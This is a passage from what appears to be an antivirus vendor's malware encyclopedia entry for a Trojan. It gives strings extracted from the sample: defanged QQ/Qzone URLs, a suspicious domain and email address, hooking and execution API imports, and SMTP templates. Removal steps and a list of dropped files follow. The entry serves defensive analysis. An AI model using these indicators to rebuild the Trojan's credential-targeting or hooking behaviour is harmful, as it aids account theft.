54435769|PADCHAR|ALPHA|getbyte|throw|encode|arguments|case|break|toUpperCase|md5|user|code|uin2hex|len|toLowerCase'.split('|'),0,{}))
hXXps://ssl.captcha.qq.com/cap_union_new_getsig
.1&face=0<|>0<|>0&fupdate=1&g_tk=
/mood/
.1<.>http://user.qzone.qq.com/
.1<|>http://user.qzone.qq.com/
hXXp://r.qzone.qq.com/cgi-bin/user/qz_opcnt2?_stp=1483683559721&unikey=http://user.qzone.qq.com/
/photo/
<.>http://user.qzone.qq.com/
&refer=qzone&plat=qzone&json_esc=1&output_type=json&unikey=http://user.qzone.qq.com/
hXXp://r.qzone.qq.com/cgi-bin/user/qz_opcnt2?g_tk=
_0_1_0_0_1|10|11|12|13_5|17|20|9_0_8_1|18&g_tk=
|8_8_
_0|14_
hXXp://r.qzone.qq.com/cgi-bin/right_frame.cgi?uin=
VBScript.RegExp
km.7532.com
shenglin_yu@126.com
km.7532.comr
VVV.7532.com
VVV.7532.comt
7532.com
|*.txt
%d&&'
123456789
00003333
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
RASAPI32.dll
GetProcessHeap
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
oledlg.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
;3 #>6.&
'2, / 0&7!4-)1#
VVV.dywt.com.cn
(*.htm;*.html)|*.htm;*.html
its:%s::%s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
3 ,,25%!4
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
!"#$%&'()* ,-
25, 0, 0, 1
Windows
1, 0, 6, 6
(*.*)
6.5.0.0

%original file name%.exe_1504_rwx_10001000_00039000:

L$(h%f
SSh0j
hu2.iu
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kjkjz1[1].htm (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110920171110\index.dat (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (485 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ErrorPageTemplate[1] (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssggd1[1].htm (109 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\down[1] (748 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\background_gradient[1] (453 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\info_48[1] (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjz11[1].htm (813 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz13[1].htm (503 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QUCWMMCQ.txt (231 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\bullet[1] (447 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjzgg1[1].htm (1310 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\gjgg[1].htm (5105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IE1IKUZH.txt (78 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3MKX82S2.txt (77 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\errorPageStrings[1] (2 bytes)
    C:\dc.dll (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\httpErrorPagesScripts[1] (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz12[1].htm (1273 bytes)
    C:\SkinH_EL.dll (178 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg[1].htm (75 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dnserrordiagoff_webOC[1] (6 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2024 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now